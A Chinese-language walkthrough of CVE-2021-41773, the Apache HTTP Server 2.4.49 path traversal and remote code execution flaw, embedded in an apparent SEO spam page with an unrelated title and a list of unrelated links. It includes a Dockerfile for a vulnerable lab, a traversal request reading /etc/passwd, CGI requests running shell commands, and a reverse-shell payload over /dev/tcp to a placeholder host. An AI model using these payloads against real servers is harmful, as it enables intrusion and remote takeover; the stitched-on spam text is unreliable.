当前位置: 首页 > news >正文

群晖可以做几个网站企业网站制作正规公司

news 2025/11/19 4:55:54
群晖可以做几个网站,企业网站制作正规公司,网络广告图片,52种新颖的促销方式简介#xff1a; Apache HTTP Server是一个开源、跨平台的Web服务器#xff0c;它在全球范围内被广泛使用。2021年10月5日#xff0c;Apache发布更新公告#xff0c;修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞#xff08;CVE-2021-41773#xff09;。… 简介 Apache HTTP Server是一个开源、跨平台的Web服务器它在全球范围内被广泛使用。2021年10月5日Apache发布更新公告修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞CVE-2021-41773。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护默认禁用则这些恶意请求就会成功。除此之外该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。 漏洞描述  在对 Apache HTTP Server 2.4.49 中的路径规范化所做的更改中发现一个缺陷。穿越的目录允许被访问比如配置了Directory /Require all granted/Directory攻击者可能使用路径遍历攻击将 URL 映射到类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“require all denied”的保护则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本则可以允许远程执行代码。此问题仅影响 Apache 2.4.49而不影响早期版本。 CVE Record | CVEhttps://www.cve.org/CVERecord?idCVE-2021-41773 指纹app:“apache web server 2.4.49 2.4.50” 影响版本 ​ Apache HTTP Server 2.4.49 漏洞复现 靶场准备 docker环境搭建: mkdir Dockerfile //在空目录里面创建Dockerfile目录 cd Dockerfile //进入Dockerfile目录 vi Dockerfile //创建文件Dockerfil并编写编辑DockerFile文件内容 FROM httpd:2.4.49RUN set -ex \ sed -i s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g /usr/local/apache2/conf/httpd.conf \ sed -i s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g /usr/local/apache2/conf/httpd.conf \ sed -i s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g /usr/local/apache2/conf/httpd.conf \ cat /usr/local/apache2/conf/httpd.conf \| tr \n \r \| perl -pe s|Directory /.*?/Directory|Directory /\n AllowOverride none\n Require all granted\n/Directory|isg \| tr \r \n \| tee /tmp/httpd.conf \ mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf 执行构建操作  docker build -t httpd:2.4.49rce . 运行docker: docker run -d -p 85:80 httpd:2.4.49rce 浏览器访问85端口出现“It works!”说明部署成功: poc 目录遍历POC: curl -v --path-as-is http://XXXXX:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd或者 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 exp  POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: xx.xx.xx.xx:xx Content-Type: text/plain Content-Length: 8echo; id curl -s --path-as-is -d echo Content-Type: text/plain; echo; id xx.xx.xx.xx:xx/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh 反弹shell: POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: 123.58.224.8:63275 Content-Type: text/plain Content-Length: 50echo; bash -c 0168-;exec 168/dev/tcp/xx.xx.xx.xx/xx;bash 168 168 2168 漏洞修复  升级Apache HTTP Server到最新版本
http://www.dnsts.com.cn/news/63993.html

相关文章:

  • 不懂的人做网站用织梦 还是 cms可做装饰推广的网站
  • wamp做的网站上传网站建设品牌公司排名
  • 网站和App建设成本企业免费网站建设模板下载
  • 全国建设工程招标信息网站wordpress上传doc文件
  • 电商网站现状分析张家界旅游网站官网
  • 苍南最新发布请配合seo查询怎么查
  • WordPress搭建社区网站做系统那个网站好
  • 宁波网站推广公司价格拉新充场app推广平台
  • 高古楼网站 做窗子企业网站建设网站优化推广
  • 网站设计的思路公司网站建设怎么协调内容与保密
  • 炒股配资网站开发中国风电商网站建设
  • 无锡做网站公司黑色门户网站源码
  • 网站开发都用什么浏览器网站网络推广优化
  • 网站建设系统教程嘉兴做网站建设的公司哪家好
  • 建行互联网站提供商城网站建设
  • 网站建设技术部职责外贸管理软件免费
  • 合肥网站建设认准 晨飞网络北京好网站制作公司哪家好
  • 使用php做的学校网站吗wordpress快速下载地址
  • 网站规划说明网站推广排名哪家公司好
  • 北京网站seo推广中铁建工集团有限公司官网
  • 网站空间期限查询wordpress 文章置顶不显示
  • 中国建设银行北京天竺支行网站自己做的网站怎么调用百度地图
  • 免费网站建设站施工企业质量管理应遵循的原则
  • 微信分销网站建设比较好安全网站开发
  • 网站上传wordpress做美食网站的目的
  • 建设银行的官方网站建设网站的价格表
  • 投资公司网站模板桓台县网站建设
  • 网站怎么做实名认证php整站开发 企业网站教程
  • 建设银行明细网站能查多久网页设计个人网站心得体会
  • 云南购物网站建设凡科网登陆